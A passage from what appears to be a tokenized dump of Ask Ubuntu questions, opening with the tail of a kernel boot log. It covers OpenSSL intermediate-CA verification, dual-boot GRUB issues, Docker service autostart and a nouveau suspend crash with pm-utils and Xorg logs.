apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=923 comm= '' apparmor_parser '' [ 19.474148 ] type=1400 audit ( 1407211585.984:4 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=983 comm= '' apparmor_parser '' [ 19.474155 ] type=1400 audit ( 1407211585.984:5 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=923 comm= '' apparmor_parser '' [ 19.474311 ] type=1400 audit ( 1407211585.984:6 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=983 comm= '' apparmor_parser '' [ 19.474321 ] type=1400 audit ( 1407211585.984:7 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=923 comm= '' apparmor_parser '' [ 19.511003 ] type=1400 audit ( 1407211586.020:8 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=734 comm= '' apparmor_parser '' [ 19.511343 ] type=1400 audit ( 1407211586.020:9 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/cupsd '' pid=734 comm= '' apparmor_parser '' [ 19.512786 ] input : hp wmi hotkeys as /devices/virtual/input/input4 [ 20.073411 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 20.073413 ] bluetooth : bnep filters : protocol multicast [ 20.073419 ] bluetooth : bnep socket layer initialized [ 20.152549 ] [ drm ] memory usable by graphics device = 2048m [ 20.152555 ] i915 0000:00:02.0 : setting latency timer to 64 [ 20.152756 ] i915 0000:00:02.0 : irq 45 for msi/msi-x [ 20.152762 ] [ drm ] supports vblank timestamp caching rev 1 ( 10.10.2010 ) . [ 20.152763 ] [ drm ] driver supports precise vblank timestamp query . [ 20.152785 ] vgaarb : device changed decodes : pci:0000:00:02.0 , olddecodes=io+mem , decodes=io+mem : owns=io+mem [ 20.338061 ] psmouse serio1 : synaptics : touchpad model : 1 , fw : 8.1 , id : 0x1e2b1 , caps : 0xd00123/0x840300/0x26c00 , board id : 2055 , fw id : 1096837 [ 20.372524 ] fbcon : inteldrmfb ( fb0 ) is primary device [ 20.401480 ] input : synps/2 synaptics touchpad as /devices/platform/i8042/serio1/input/input5 [ 20.618521 ] cfg80211 : world regulatory domain updated : [ 20.618522 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 20.618523 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 20.618524 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 20.618525 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 20.618526 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 20.618527 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 20.943550 ] ieee80211 phy0 : selected rate control algorithm 'minstrel_ht' [ 21.243721 ] console : switching to colour frame buffer device 200x56 [ 21.246903 ] i915 0000:00:02.0 : fb0 : inteldrmfb frame buffer device [ 21.246904 ] i915 0000:00:02.0 : registered panic notifier [ 21.479682 ] acpi device:3c : registered as cooling_device8 [ 21.479819 ] acpi : video device [ gfx0 ] ( multi-head : yes rom : no post : no ) [ 21.479875 ] input : video bus as /devices/lnxsystm:00/lnxsybus:00/pnp0a08:00/lnxvideo:00/input/input6 [ 21.479988 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 21.480140 ] snd_hda_intel 0000:00:1b.0 : irq 46 for msi/msi-x [ 21.656018 ] input : hda intel pch hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:1b.0/sound/card0/input7 [ 21.656090 ] input : hda intel pch mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input8 [ 21.656149 ] input : hda intel pch headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input9 [ 21.835605 ] [ drm ] enabling rc6 states : rc6 on , rc6p on , rc6pp off [ 23.078158 ] linux video capture interface : v2.00 [ 23.303553 ] uvcvideo : found uvc 1.00 device hp truevision hd ( 04f2 : b2f8 ) [ 23.314483 ] input : hp truevision hd as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.3/1-1.3:1.0/input/input10 [ 23.314622 ] usbcore : registered new interface driver uvcvideo [ 23.314624 ] usb video class driver ( 1.1.1 ) [ 23.581780 ] init : failsafe main process ( 1054 ) killed by term signal [ 28.338543 ] type=1400 audit ( 1407211594.852:10 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=1304 comm= '' apparmor_parser '' [ 28.338934 ] type=1400 audit ( 1407211594.852:11 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=1304 comm= '' apparmor_parser '' [ 28.339152 ] type=1400 audit ( 1407211594.852:12 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=1304 comm= '' apparmor_parser '' [ 28.339230 ] type=1400 audit ( 1407211594.852:13 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=1308 comm= '' apparmor_parser '' [ 28.339617 ] type=1400 audit ( 1407211594.852:14 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/cupsd '' pid=1308 comm= '' apparmor_parser '' [ 28.591698 ] type=1400 audit ( 1407211595.108:15 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/tcpdump '' pid=1311 comm= '' apparmor_parser '' [ 28.599772 ] type=1400 audit ( 1407211595.112:16 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /opt/extras.ubuntu.com/unity-lens-askubuntu/unity-askubuntu-daemon '' pid=1303 comm= '' apparmor_parser '' [ 28.606569 ] type=1400 audit ( 1407211595.120:17 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/mission-control-5 '' pid=1307 comm= '' apparmor_parser '' [ 28.606900 ] type=1400 audit ( 1407211595.120:18 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/telepathy-* '' pid=1307 comm= '' apparmor_parser '' [ 28.645714 ] type=1400 audit ( 1407211595.160:19 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' pid=1302 comm= '' apparmor_parser '' [ 30.557331 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 30.864888 ] r8169 0000:05:00.0 eth0 : link down [ 30.864958 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 30.864975 ] r8169 0000:05:00.0 eth0 : link down [ 30.865289 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 32.565594 ] r8169 0000:05:00.0 eth0 : link up [ 32.565601 ] ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready [ 34.120226 ] nfsd : using /var/lib/nfs/v4recovery as the nfsv4 state recovery directory [ 34.137151 ] nfsd : starting 90-second grace period ( net c192d340 ) [ 40.219580 ] init : mongodb main process ( 1448 ) terminated with status 100 [ 41.408057 ] disabling lock debugging due to kernel taint [ 41.410810 ] vboxdrv : found 8 processor cores . [ 41.411041 ] vboxdrv : fasync=0 offmin=0x18d offmax=0x1066 [ 41.411094 ] vboxdrv : tsc mode is 'synchronous ' , kernel timer mode is 'normal ' . [ 41.411096 ] vboxdrv : successfully loaded version 4.3.14 ( interface 0x001a0007 ) . [ 41.873336 ] vboxpci : iommu not found ( not registered ) [ 53.033262 ] non-volatile memory driver v1.3 [ 56.745640 ] init : plymouth-stop pre-start process ( 2458 ) terminated with status 1 [ 101.460328 ] acpi error : [ ^^^peg0.pegp.dd02 ] namespace lookup failure , ae_not_found ( 20121018/psargs-359 ) [ 101.460334 ] acpi error : method parse/execution failed [ \_sb_.pci0.lpcb.ec0_._q1c ] ( node f7433c90 ) , ae_not_found ( 20121018/psparse-537 ) [ 101.694469 ] acpi error : [ ^^^peg0.pegp.dd02 ] namespace lookup failure , ae_not_found ( 20121018/psargs-359 ) [ 101.694475 ] acpi error : method parse/execution failed [ \_sb_.pci0.lpcb.ec0_._q1c ] ( node f7433c90 ) , ae_not_found ( 20121018/psparse-537 ) [ 102.012171 ] acpi error : [ ^^^peg0.pegp.dd02 ] namespace lookup failure , ae_not_found ( 20121018/psargs-359 ) [ 102.012177 ] acpi error : method parse/execution failed [ \_sb_.pci0.lpcb.ec0_._q1c ] ( node f7433c90 ) , ae_not_found ( 20121018/psparse-537 ) [ 102.158567 ] acpi error : [ ^^^peg0.pegp.dd02 ] namespace lookup failure , ae_not_found ( 20121018/psargs-359 ) [ 102.158573 ] acpi error : method parse/execution failed [ \_sb_.pci0.lpcb.ec0_._q1c ] ( node f7433c90 ) , ae_not_found ( 20121018/psparse-537 ) [ 221.928891 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 222.133874 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 222.189196 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 222.290549 ] r8169 0000:05:00.0 eth0 : link down [ 222.290604 ] r8169 0000:05:00.0 eth0 : link down [ 222.290633 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 222.291001 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 223.930026 ] r8169 0000:05:00.0 eth0 : link up [ 223.930042 ] ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready
507001	verifying certificates signed by intermediate ca	i am trying to figure out how to use openssl to verify a certificate that has been signed by an intermediate ca which i have signed with my root ca . i tried concatenating the certificate with the intermediate and root certificates as i saw suggested in some places , but i still get an `` unable to get local issuer certificate '' error . what should i do ? for reference , the command i am using is as follows : cat my_cert.crt intermediate_ca.crt root_ca.crt > cert_chain.crt my certificates , when concatenated , look like : -- -- -begin certificate -- -- - ... -- -- -end certificate -- -- - -- -- -begin certificate -- -- - ... -- -- -end certificate -- -- - -- -- -begin certificate -- -- - ... -- -- -end certificate -- -- - which i believe is the correct format . the error i get is : openssl verify -cafile cacert.crt cert_chain.crt : c = us , st = state , o = company , ou = unit , cn = common name
507004	is there a way to get the windows 8.1 grub screen when i boot ?	i have dual booted windows 8.1 and ubuntu 14.04 on my laptop . i like the uniformity and the look as well as ease of the windows 8.1 boot screen . is there a way i can have that screen to choose my operating system on when i boot instead of the ubuntu grub screen ?
507006	when i open a terminal session it shows ~ $ , how can i solve it ?	when the terminal is open ( ctrl+alt+t ) it shows username @ name : ~ $ . is there any problem with my permissions ? it was / $ before , but i do n't know why it changed .
507007	unable to install14.04 on toshiba satellite l40d-b	brand new toshiba satelitte l40d-b model : pskrgc-002001 windows 8.1 pre installed 64 bit amd a6-6310 apu amd radeon r4 graphics ram : 6144 mb clock : 1.80 ghz hdd toshiba 686 gb bios 1.00 english trying to install ubuntu14.04.1 from usb stick ( tried several different sticks , checked them ) this is a maintream laptop . i have already install numerous ubuntu and other distros . i tried fedora 20 and ubuntu 13.10 on this computer with the exact same result : i have no other computer available , and no cd/dvd i tried to install with secure boot and uefi on at first , then turned off secure boot then turned off uefi with secure boot and uefi on , the install strarts , then a grub screen asking me to choose between live , install , oem install and check for disk defects . i tried them all repeatedly . the screen goes dark and after 10 seconds , the computer reboot . with secure boot off and uefi on , same thing with both swcure boot ad uefi off , first i could go to the language page of the install . choose english . then same thing . the computer reboots . i switched live usb creator ( windows ) for unetbootin to make usb stick . same thing except unetboot screen ( blue ) instead of grub ( dark ) i tried then to partition hdd with windows . same thing .
507008	black screen on bootup	i 've had a problem since loading ubuntu alongside my windows install now . i 'm running 14.04 and using gnome 3.12 shell and lightdm . when booting up the ubuntu splash screen looks normal and pushes me towards lightdm as it should , upon entering lightdm i feel like something is freezing or not loading as the graphical lightdm does n't start up , i hear the chime that lightdm uses when it 's fully loaded after afew seconds but the screen stays black - there 's no cursor either . i can access all my ctrl + alt + f1 keys my nvidia drivers are the current drivers downloaded from nvidia themselves which is 340.24 , i 've tried purging that and going back to noveau or whatever the default driver is and had no luck at all . i 'm using a asus gtx770 i 've found a way to boot into ubuntu that works with everything set as i have it now and that is to boot into the linux kernal 3.11-30 recovery mode generic once the recovery menu has come up all i do is hit resume and it works first time and everytime . i have 3 kernal options 3.11-32 , -30 , and -24 -32 has errors sometimes and takes a while to boot , -30 works every time without fail and i have n't tested -24 . i have edited my grub file to have grub_cmdline_linux_default= '' quiet nosplash nohz=off '' and it does n't look like anything errors or freezes , it just goes through the normal boot up sequence , every line says ok at the end of it but then it still kicks me out to a blank lightdm screen . i 'm at work for the next 9 hours so i ca n't test anything but i 'll update when i get back from work this evening . thanks . `
507010	error : must set personality to get -x option	why this command works : ps -ax | grep mongo but when i try set it to variable : ubuntu # command='ps -ax | grep mongo' ubuntu # echo $ command ps -ax | grep mongo it gives me error , when calling : ubuntu # $ command error : must set personality to get -x option usage : ps [ options ] try 'ps -- help < simple|list|output|threads|misc|all > ' or 'ps -- help < s|l|o|t|m|a > ' for additional help text . for more details see ps ( 1 ) .
507012	hl-1110 xml paper brother printer does not install on ubuntu 14.04	have tried installing on windows and the printer works . it is supposedly linux compatible . has anyone else found a printer driver for this printer ? i have tried through the console and got a supposed match with hl1070 which will not print , and via terminal and sudo with instructions from the brother site but no package has turned up .
507013	windows 8.1 changes boot order	i am running dual-boot with ubuntu 14.04 and windows 8.1 . everything works great without needing to live boot ... except one problem i ca n't figure out . every time i boot into windows , it rearranges the boot order to what appears to be default settings . let me clarify , if i boot into ubuntu and restart , then i go to the grub menu . but if i boot into windows and restart , then i go straight back into windows . when this happens i immediately check the bios and find that all settings are the same as i left them except the boot order has been rearranged as previously mentioned . can anyone explain why this happens or how to stop it ? i tried changing the `` default operating system '' through windows control panel but , of course , only windows is recognized and listed as an option . for the time being , i set the post messages to display and delay 20 seconds so i can go straight to bios , change the boot order , and boot ubuntu from there instead of starting windows and rebooting . but i would love to have my grub menu working properly . by the way , i 'm very new to linux , scripting , etc , so please do n't expect me to understand a lot of jargon . i only know the bits and pieces i 've introduced myself to as need be . thank you all for your time and assistance in this matter .
507015	gedit automatic session saving	i am using gedit on ubuntu machine . suppose if i open gedit and open some files say - file1.txt & file2.txt , then after if i close the gedit and reopen once again then it is creating a new session instead of opening the previous files - file1.txt & file2.txt i tried installing gmate using this link - https : //github.com/gmate/gmate # readme , but when i go to edit -- > preferences then i got an error saying error : plugin loader `` python '' was not found.. so i used this link - https : //github.com/gmate/gmate/issues/153 and updated my plugin file with loader = python3 . then i started getting another error as ** ( gedit:17302 ) : warning ** : could not load gedit repository : typelib file for namespace 'gtksource ' , version '3.0 ' not found error : root : could not find any typelib for gedit traceback ( most recent call last ) : file `` /usr/lib/gedit/plugins/restoretabs/restoretabs.py '' , line 2 , in from gi.repository import gobject , glib , gtk , gio , gedit importerror : can not import name gedit ( gedit:17302 ) : libpeas-warning ** : error loading plugin 'restoretabs' i am keep on getting so many errors , after searching in internet for a long time i came to this point . please help me how can i fix this .
507019	windows and grub boot loaders being seperate	when i boot up my laptop it goes to the windows boot loader and i can pick to boot windows 8.1 or ubuntu but it wont boot ubuntu when i click on it and in order to boot ubuntu i have to select the boot device and select ubuntu as the computers sees that partition as another drive in the boot device menu . when i select the ubuntu partition in the boot order it loads grub which lets me pick if i want to load ubuntu or go to the windows boot loader . dose this mean the boot loaders are comepletly seperate and if i mess one up the other will be fine
507020	application does n't launch on startup ( autostart ) inside docker 's container	the problem i faced with is none of applications does n't launch on the system boot . i have image based on ubuntu:14.04 installed nginx , php5 and mariadb . on every boot ( ! ) i have to start services manually as follows : $ sudo service [ nginx | php5-fpm | mysql ] start i check nginx autostart by using update-rc.d $ sudo update-rc.d filename defaults $ system start/stop links for /etc/init.d/nginx already exist . but i get nothing . maybe the information beyond will helpful : after system start-up i have as follows : $ sudo service -- status-all [ ? ] console-setup [ + ] cron [ ? ] killprocs [ ? ] kmod [ ? ] mysql [ ? ] networking [ - ] nginx [ ? ] ondemand [ - ] php5-fpm [ - ] procps [ ? ] rc.local [ + ] resolvconf [ - ] rsyslog [ ? ] sendsigs . . . generally speaking , i absolutely have no idea how to solve this problem !
507021	ubuntu 14.04 crashes on resuming from suspend	scenario . i recently uninstalled nvidia propitiatory drivers , and installed nouveau ones . before that , sleep and resume worked fine . so it might be a driver issue , but i dont want to taint my kernel again . problem pm-suspend or closing the lid suspends the session , but on resuming , i am stuck at login screen . everything freezes and a hard reboot is needed to start things again . logs tue aug 5 00:55:09 ist 2014 : finished . initial commandline parameters : tue aug 5 01:15:14 ist 2014 : running hooks for suspend . running hook /usr/lib/pm-utils/sleep.d/000kernel-change suspend suspend : /usr/lib/pm-utils/sleep.d/000kernel-change suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/000record-status suspend suspend : /usr/lib/pm-utils/sleep.d/000record-status suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/00logging suspend suspend : linux hardy 3.13.0-32-generic # 57-ubuntu smp tue jul 15 03:51:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux module size used by ppp_deflate 12950 0 bsd_comp 12921 0 ppp_async 17413 1 crc_ccitt 12707 1 ppp_async ip6table_filter 12815 0 ip6_tables 27025 1 ip6table_filter pci_stub 12622 1 vboxpci 23194 0 vboxnetadp 25670 0 vboxnetflt 27613 0 vboxdrv 339502 3 vboxnetadp , vboxnetflt , vboxpci rfcomm 69160 8 bnep 19624 2 binfmt_misc 17468 1 nls_iso8859_1 12713 1 snd_hda_codec_hdmi 46254 4 iptable_filter 12810 0 ipt_masquerade 12880 1 zte_ev 13178 2 iptable_nat 13011 1 nf_conntrack_ipv4 15012 1 nf_defrag_ipv4 12758 1 nf_conntrack_ipv4 nf_nat_ipv4 13263 1 iptable_nat nf_nat 21841 3 ipt_masquerade , nf_nat_ipv4 , iptable_nat nf_conntrack 96976 5 ipt_masquerade , nf_nat , nf_nat_ipv4 , iptable_nat , nf_conntrack_ipv4 iptable_mangle 12695 0 ip_tables 27239 3 iptable_filter , iptable_mangle , iptable_nat x_tables 34059 6 ip6table_filter , ip_tables , ipt_masquerade , iptable_filter , iptable_mangle , ip6_tables usbserial 45014 6 zte_ev arc4 12608 2 iwldvm 232285 0 mac80211 630653 1 iwldvm ppdev 17671 0 uvcvideo 80885 0 videobuf2_vmalloc 13216 1 uvcvideo videobuf2_memops 13362 1 videobuf2_vmalloc videobuf2_core 40664 1 uvcvideo videodev 134688 2 uvcvideo , videobuf2_core dell_laptop 18168 0 dcdbas 14928 1 dell_laptop snd_hda_codec_realtek 61438 1 btusb 32412 0 bluetooth 391196 22 bnep , btusb , rfcomm snd_hda_intel 52355 5 snd_hda_codec 192906 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30144 1 snd_seq_midi snd_pcm 102099 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 18710 2 snd_pcm , snd_hda_intel intel_rapl 18773 0 x86_pkg_temp_thermal 14205 0 intel_powerclamp 14705 0 kvm_intel 143060 0 kvm 451511 1 kvm_intel crct10dif_pclmul 14289 0 crc32_pclmul 13113 0 ghash_clmulni_intel 13216 0 aesni_intel 55624 0 aes_x86_64 17131 1 aesni_intel lrw 13286 1 aesni_intel gf128mul 14951 1 lrw glue_helper 13990 1 aesni_intel ablk_helper 13597 1 aesni_intel snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi cryptd 20359 3 ghash_clmulni_intel , aesni_intel , ablk_helper snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29482 2 snd_pcm , snd_seq joydev 17381 0 serio_raw 13462 0 iwlwifi 169932 1 iwldvm cfg80211 484040 3 iwlwifi , mac80211 , iwldvm lpc_ich 21080 0 snd 69238 21 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi mei_me 18627 0 mei 82276 1 mei_me soundcore 12680 1 snd dell_wmi 12761 0 sparse_keymap 13948 1 dell_wmi nouveau 1097199 4 mxm_wmi 13021 1 nouveau wmi 19177 3 dell_wmi , mxm_wmi , nouveau video 19476 1 nouveau ttm 85115 1 nouveau drm_kms_helper 53081 1 nouveau drm 303102 6 ttm , drm_kms_helper , nouveau mac_hid 13205 0 i2c_algo_bit 13413 1 nouveau coretemp 13435 0 lp 17759 0 parport 42348 2 lp , ppdev hid_generic 12548 0 usbhid 52570 0 hid 106148 2 hid_generic , usbhid psmouse 106678 0 ahci 25819 3 r8169 67581 0 libahci 32560 1 ahci mii 13934 1 r8169 total used free shared buffers cached mem : 8135984 2435028 5700956 52340 154652 956940 -/+ buffers/cache : 1323436 6812548 swap : 9764860 0 9764860 /usr/lib/pm-utils/sleep.d/00logging suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/00powersave suspend suspend : /usr/lib/pm-utils/sleep.d/00powersave suspend suspend : success . running hook /etc/pm/sleep.d/10_grub-common suspend suspend : /etc/pm/sleep.d/10_grub-common suspend suspend : success . running hook /etc/pm/sleep.d/10_unattended-upgrades-hibernate suspend suspend : /etc/pm/sleep.d/10_unattended-upgrades-hibernate suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/50unload_alx suspend suspend : /usr/lib/pm-utils/sleep.d/50unload_alx suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/60_wpa_supplicant suspend suspend : selected interface 'wlan0' ok /usr/lib/pm-utils/sleep.d/60_wpa_supplicant suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/75modules suspend suspend : /usr/lib/pm-utils/sleep.d/75modules suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/90clock suspend suspend : /usr/lib/pm-utils/sleep.d/90clock suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/94cpufreq suspend suspend : /usr/lib/pm-utils/sleep.d/94cpufreq suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/95anacron suspend suspend : stop : unknown instance : /usr/lib/pm-utils/sleep.d/95anacron suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/95hdparm-apm suspend suspend : /usr/lib/pm-utils/sleep.d/95hdparm-apm suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/95led suspend suspend : /usr/lib/pm-utils/sleep.d/95led suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler suspend suspend : kernel modesetting video driver detected , not using quirks . /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/99video suspend suspend : kernel.acpi_video_flags = 0 /usr/lib/pm-utils/sleep.d/99video suspend suspend : success . running hook /etc/pm/sleep.d/novatel_3g_suspend suspend suspend : /etc/pm/sleep.d/novatel_3g_suspend suspend suspend : success . tue aug 5 01:15:15 ist 2014 : performing suspend tue aug 5 01:15:29 ist 2014 : awake . tue aug 5 01:15:29 ist 2014 : running hooks for resume running hook /etc/pm/sleep.d/novatel_3g_suspend resume suspend : /etc/pm/sleep.d/novatel_3g_suspend resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/99video resume suspend : /usr/lib/pm-utils/sleep.d/99video resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler resume suspend : /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/95led resume suspend : /usr/lib/pm-utils/sleep.d/95led resume suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/95hdparm-apm resume suspend : /dev/sda : setting advanced power management level to 0xfe ( 254 ) apm_level = 254 /dev/sdb : setting advanced power management level to 0xfe ( 254 ) apm_level = 254 /usr/lib/pm-utils/sleep.d/95hdparm-apm resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/95anacron resume suspend : /usr/lib/pm-utils/sleep.d/95anacron resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/94cpufreq resume suspend : /usr/lib/pm-utils/sleep.d/94cpufreq resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/90clock resume suspend : /usr/lib/pm-utils/sleep.d/90clock resume suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/75modules resume suspend : reloaded unloaded modules . /usr/lib/pm-utils/sleep.d/75modules resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/60_wpa_supplicant resume suspend : selected interface 'wlan0' ok /usr/lib/pm-utils/sleep.d/60_wpa_supplicant resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/50unload_alx resume suspend : /usr/lib/pm-utils/sleep.d/50unload_alx resume suspend : success . running hook /etc/pm/sleep.d/10_unattended-upgrades-hibernate resume suspend : /etc/pm/sleep.d/10_unattended-upgrades-hibernate resume suspend : success . running hook /etc/pm/sleep.d/10_grub-common resume suspend : /etc/pm/sleep.d/10_grub-common resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/00powersave resume suspend : /usr/lib/pm-utils/sleep.d/00powersave resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/00logging resume suspend : /usr/lib/pm-utils/sleep.d/00logging resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/000record-status resume suspend : /usr/lib/pm-utils/sleep.d/000record-status resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/000kernel-change resume suspend : /usr/lib/pm-utils/sleep.d/000kernel-change resume suspend : success . the xorg logs [ 3167.616 ] ( ii ) aiglx : suspending aiglx clients for vt switch [ 3167.616 ] ( ii ) nouveau ( 0 ) : nvleavevt is called . [ 3174.793 ] ( ii ) aiglx : resuming aiglx clients after vt switch [ 3174.793 ] ( ii ) nouveau ( 0 ) : nventervt is called . [ 3174.831 ] ( ii ) nouveau ( 0 ) : edid vendor `` lgd '' , prod id 709 [ 3174.831 ] ( ii ) nouveau ( 0 ) : printing ddc gathered modelines : [ 3174.831 ] ( ii ) nouveau ( 0 ) : modeline `` 1920x1080 '' x0.0 148.50 1920 2008 2052 2 200 1080 1084 1089 1125 +hsync -vsync ( 67.5 khz ep ) [ 3174.831 ] ( ii ) nouveau ( 0 ) : modeline `` 1920x1080 '' x0.0 396.36 1920 1968 2000 2 888 1080 1083 1088 1372 +hsync -vsync ( 137.2 khz e ) [ 3174.831 ] ( ii ) nouveau ( 0 ) : modeline `` 1920x1080 '' x0.0 396.36 1920 1968 2000 2 888 1080 1083 1088 1248 +hsync -vsync ( 137.2 khz e ) [ 3174.831 ] ( ii ) nouveau ( 0 ) : modeline `` 1920x1080 '' x0.0 396.36 1920 1968 2000 2 888 1080 1083 1088 1144 +hsync -vsync ( 137.2 khz e ) [ 3174.961 ] ( -- ) synaptics : synps/2 synaptics touchpad : touchpad found ( ee ) [ mi ] eq overflowing . additional events will be discarded until existing ev ents are processed . ( ee ) ( ee ) backtrace : ( ee ) 0 : /usr/bin/x ( xorg_backtrace+0x48 ) [ 0x7f9338f3cc78 ] ( ee ) 1 : /usr/bin/x ( mieqenqueue+0x22b ) [ 0x7f9338f1eceb ] ( ee ) 2 : /usr/bin/x ( queuepointerevents+0x52 ) [ 0x7f9338e00b12 ] ( ee ) 3 : /usr/lib/xorg/modules/input/evdev_drv.so ( 0x7f932f4c3000+0x57fd ) [ 0x7f93 2f4c87fd ] ( ee ) 4 : /usr/bin/x ( 0x7f9338d94000+0x92e88 ) [ 0x7f9338e26e88 ] ( ee ) 5 : /usr/bin/x ( 0x7f9338d94000+0xbb530 ) [ 0x7f9338e4f530 ] ( ee ) 6 : /lib/x86_64-linux-gnu/libpthread.so.0 ( 0x7f9337e91000+0x10340 ) [ 0x7f9337 ea1340 ] ( ee ) 7 : /lib/x86_64-linux-gnu/libc.so.6 ( ioctl+0x7 ) [ 0x7f93369a11c7 ] ( ee ) 8 : /usr/lib/x86_64-linux-gnu/libdrm.so.2 ( drmioctl+0x34 ) [ 0x7f9337c883a4 ] ( ee ) 9 : /usr/lib/x86_64-linux-gnu/libdrm.so.2 ( drmcommandwrite+0x1e ) [ 0x7f9337c8 a6be ] ( ee ) 10 : /usr/lib/x86_64-linux-gnu/libdrm_nouveau.so.2 ( nouveau_bo_wait+0x89 ) [ 0 x7f9332e3f1c9 ] ( ee ) 11 : /usr/lib/x86_64-linux-gnu/libdrm_nouveau.so.2 ( nouveau_pushbuf_space+0x c6 ) [ 0x7f9332e403f6 ] ( ee ) 12 : /usr/lib/xorg/modules/drivers/nouveau_drv.so ( 0x7f9333043000+0x23859 ) [ 0x7f9333066859 ] ( ee ) 13 : /usr/lib/xorg/modules/libexa.so ( 0x7f9332a02000+0xd70f ) [ 0x7f9332a0f70f ] ( ee ) 14 : /usr/lib/xorg/modules/libexa.so ( 0x7f9332a02000+0xe1bc ) [ 0x7f9332a101bc ] ( ee ) 15 : /usr/lib/xorg/modules/libexa.so ( 0x7f9332a02000+0xc028 ) [ 0x7f9332a0e028 ] ( ee ) 16 : /usr/bin/x ( 0x7f9338d94000+0x1333a6 ) [ 0x7f9338ec73a6 ] ( ee ) 17 : /usr/bin/x ( 0x7f9338d94000+0x12988e ) [ 0x7f9338ebd88e ] ( ee ) 18 : /usr/bin/x ( 0x7f9338d94000+0x55abe ) [ 0x7f9338de9abe ] ( ee ) 19 : /usr/bin/x ( 0x7f9338d94000+0x5994a ) [ 